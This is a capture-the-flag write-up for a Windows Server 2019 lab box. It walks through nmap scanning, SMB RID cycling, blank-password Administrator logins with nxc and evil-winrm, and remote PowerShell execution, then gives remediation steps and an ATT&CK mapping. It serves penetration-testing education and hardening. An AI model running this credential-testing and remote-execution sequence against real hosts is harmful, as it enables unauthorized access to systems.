Box info | OS: Windows Server 2019 Standard Build 17763 x64 | Difficulty: Very Easy | Tier: 0 | Status: Starting Point Skills: SMB enumeration, RDP basics, WinRM, blank-password credential testing Pwned: 2026-04-27
TL;DR
Explosion is a Windows Server 2019 box with a single critical misconfiguration: the built-in Administrator account has a blank password. A port scan reveals SMB (445), RDP (3389), and WinRM (5985). SMB guest login enumerates the machine name and RID-cycles the Administrator account. Testing Administrator with a blank password via nxc immediately returns Pwn3d! over both SMB and WinRM. The flag sits on the Administrator’s desktop at C:\Users\Administrator\Desktop\flag.txt. The lesson: always test default and blank credentials before reaching for a wordlist.
Recon
1. Liveness check
$ ping -c 3 10.129.36.59
PING 10.129.36.59 (10.129.36.59): 56 data bytes
Request timeout for icmp_seq 0
100% packet loss
ICMP filtered — Windows Server often blocks ICMP at the host firewall. Use -Pn with nmap.
2. Top-1000 port sweep
$ sudo nmap -sS -Pn --top-ports 1000 -T4 10.129.36.59
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
Classic Windows fingerprint:
- 135 — Microsoft RPC endpoint mapper
- 139/445 — SMB (NetBIOS session service + microsoft-ds)
- 3389 — RDP (Remote Desktop Protocol — the box name “Explosion” is a hint)
- 5985 — WinRM (Windows Remote Management, used by PowerShell remoting and evil-winrm)
3. Service detection + script scan
$ sudo nmap -sS -Pn -sV -sC -p 135,139,445,3389,5985 10.129.36.59
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
3389/tcp open ms-wbt-server
| rdp-ntlm-info:
| Target_Name: EXPLOSION
| NetBIOS_Computer_Name: EXPLOSION
| DNS_Computer_Name: Explosion
| Product_Version: 10.0.17763
|_ System_Time: 2026-04-27T13:55:38+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0
Key data points:
- Machine name:
EXPLOSION(from RDP NTLM info — exposed before any auth) - OS: Windows 10.0.17763 = Windows Server 2019 Build 17763
- SMB signing: not required (relay attacks possible)
Foothold
Dead end #1 — anonymous SMB
$ smbclient -N -L //10.129.36.59
session setup failed: NT_STATUS_ACCESS_DENIED
Pure anonymous blocked. Guest still allowed?
$ nxc smb 10.129.36.59 -u 'guest' -p ''
EXPLOSION\guest: — [+] login accepted (no Pwn3d! = no admin rights)
Guest is accepted but there are no interesting non-admin shares. Only ADMIN$, C$, and IPC$ — all require elevated credentials.
Dead end #2 — common passwords for Administrator
The Administrator account (RID 500) was found via RID cycling through IPC$:
$ nxc smb 10.129.36.59 -u 'guest' -p '' --rid-brute
500: EXPLOSION\Administrator (SidTypeUser)
Before trying blank, tested several common Windows passwords:
$ nxc smb 10.129.36.59 -u 'Administrator' -p 'explosion'
EXPLOSION\Administrator:explosion → STATUS_LOGON_FAILURE
$ nxc smb 10.129.36.59 -u 'Administrator' -p 'Explosion'
STATUS_LOGON_FAILURE
$ nxc smb 10.129.36.59 -u 'Administrator' -p 'Password1'
STATUS_LOGON_FAILURE
All failed. Then tried the obvious:
Working approach — Administrator with blank password
$ nxc smb 10.129.36.59 -u 'Administrator' -p ''
SMB 10.129.36.59 445 EXPLOSION [+] Explosion\Administrator: (Pwn3d!)
Pwn3d! — nxc’s notation for administrator-level SMB access confirmed.
Verify WinRM works too:
$ nxc winrm 10.129.36.59 -u 'Administrator' -p ''
WINRM 10.129.36.59 5985 EXPLOSION [+] Explosion\Administrator: (Pwn3d!)
Both SMB and WinRM accept the blank password. Full administrative access.
Command execution via WinRM
$ nxc winrm 10.129.36.59 -u 'Administrator' -p '' \
-X 'whoami; hostname; Get-ComputerInfo | Select-Object WindowsProductName, OsVersion'
[+] Executed command (shell type: powershell)
explosion\administrator
Explosion
WindowsProductName OsVersion
------------------ ---------
Windows Server 2019 Standard 10.0.17763
Flag collection
Get-ChildItem -Path C:\Users\Administrator\Desktop
# flag.txt - 34 bytes - 4/23/2021 2:51 AM
Get-Content C:\Users\Administrator\Desktop\flag.txt
[REDACTED]
Interactive session (evil-winrm)
For a proper interactive shell (required for more complex post-exploitation):
evil-winrm -i 10.129.36.59 -u Administrator -p ''
Note: On macOS, the system Ruby (2.6) is too old for evil-winrm 3.9. Fix: brew install ruby && /opt/homebrew/opt/ruby/bin/gem install evil-winrm.
Privilege Escalation
N/A — The Administrator account with a blank password already provides NT AUTHORITY\SYSTEM-equivalent access (Administrator on a standalone Windows machine is the highest local privilege). No escalation step required.
What’s actually broken
- Blank
Administratorpassword. The single most critical finding. Windows’s built-in Administrator account (RID 500) with an empty password is a direct full-system compromise. This violates CIS Control 5.4 (Default Credentials), STIG WN19-AC-000110, and every sensible password policy. - SMB guest access enabled. Allows unauthenticated clients to enumerate shares and — via IPC$ — RID-cycle to discover account names.
- WinRM exposed. Port 5985 reachable from the internet. WinRM should be restricted to management networks only.
- SMB signing not required. A relay attacker on the same segment can forward captured NTLM challenges to other Windows hosts.
- Administrator account not renamed. The known RID-500 account should be renamed or disabled; a separate named admin account should be used instead.
Remediation (the boring half)
Set a strong Administrator password immediately:
$SecurePassword = ConvertTo-SecureString "R@nd0m!P@ssw0rd#2024" -AsPlainText -Force
Set-LocalUser -Name "Administrator" -Password $SecurePassword
Disable guest SMB access:
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
Disable-LocalUser -Name "Guest"
Require SMB signing:
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
Restrict WinRM to management VLAN:
# Allow only from 10.10.0.0/16
New-NetFirewallRule -Name "WinRM-Restrict" -DisplayName "WinRM Management Only" `
-Protocol TCP -LocalPort 5985 -RemoteAddress "10.10.0.0/16" `
-Action Allow
Disable-NetFirewallRule -Name "WINRM-HTTP-In-TCP"
Disable the built-in Administrator account and create a named admin:
Disable-LocalUser -Name "Administrator"
New-LocalUser -Name "svc-mgmt" -Password (Read-Host -AsSecureString)
Add-LocalGroupMember -Group "Administrators" -Member "svc-mgmt"
MITRE ATT&CK mapping
| Tactic | Technique | How it shows up here |
|---|---|---|
| Reconnaissance | T1046 — Network Service Discovery | nmap identifies RDP, SMB, WinRM |
| Discovery | T1087 — Account Discovery | RID cycling via SMB guest → finds Administrator account |
| Initial Access | T1078 — Valid Accounts | Administrator login with blank password |
| Lateral Movement | T1021.006 — Windows Remote Management | WinRM (5985) used for remote command execution |
| Collection | T1005 — Data from Local System | Reading flag.txt from Administrator’s Desktop |
Lessons learned
- Try blank before trying wordlists. The single most impactful test on a fresh Windows machine is
Administratorwith an empty password. It takes one request and costs nothing. Wordlists come after. - RDP NTLM info leaks machine metadata pre-auth. The
rdp-ntlm-infonmap script extracts the machine name, domain, and exact Windows build version from the NTLM negotiation — no credentials required. This is normal Windows behavior, not a vulnerability. - WinRM is PowerShell remoting over HTTP. When SMB is available, psexec/wmiexec are typical choices. When SMB is present but credentials are needed for the admin share, or if SMB is firewalled, WinRM on 5985 is the alternative. Both are in the standard pentest toolkit.
Pwn3d!in nxc output means local admin. NetExec’s color-coding andPwn3d!marker specifically indicates the tested credentials have local administrator rights — useful for distinguishing regular user auth from privileged access at a glance.
🤖 AI-assist log
Transparency over polish. This is exactly where Claude was in the loop on this box.
Note: AI-assist log reconstructed from writeup context; original session interaction logs not available.
| Step | What I asked | What Claude returned | What I changed |
|---|---|---|---|
| PowerShell && vs ; | “Why does cmd1 && cmd2 fail in WinRM PowerShell?” | Explained: && is cmd.exe syntax; PowerShell uses ; as statement separator. PowerShell remoting sessions use PowerShell, not cmd.exe. | Used directly — explained the dead-end in the session log. |
| evil-winrm on macOS | “evil-winrm gem install fails on macOS — Ruby version issue?” | Identified system Ruby 2.6 incompatibility; evil-winrm 3.9 requires Ruby >= 3.0. Suggested brew install ruby and using the Homebrew-managed gem binary. | Used directly — documented in the session. |
| RDP NTLM info | “What is rdp-ntlm-info showing in nmap output?” | Explained the NTLM negotiation handshake during TLS setup — server sends NTLMSSP_NEGOTIATE which contains machine name, domain, and OS version before any auth. Not a vulnerability, just Windows behavior. | Added to Recon section. |
| MITRE for blank password | “Map blank Administrator password WinRM login to ATT&CK.” | Suggested T1078 (Valid Accounts) as primary. Noted this could also qualify as T1110.001 (Brute Force: Password Guessing) if guessing was involved. | Kept T1078 only — we tested the exact account name without guessing. Added T1021.006 for WinRM lateral movement. |
What Claude got wrong: Nothing significant; Windows auth and PowerShell syntax were accurate. What Claude couldn’t do: Connect to the target; all commands ran locally. Net assist value: Medium — mainly useful for PowerShell syntax issues and nmap output explanation.
References
- HTB Starting Point — official page
- Microsoft Docs — WinRM configuration
- MITRE ATT&CK T1021.006 — Windows Remote Management
- CIS Benchmark for Windows Server 2019 — Section 1.1.1 — password complexity
- DISA STIG WN19-AC-000110 — built-in administrator account password policy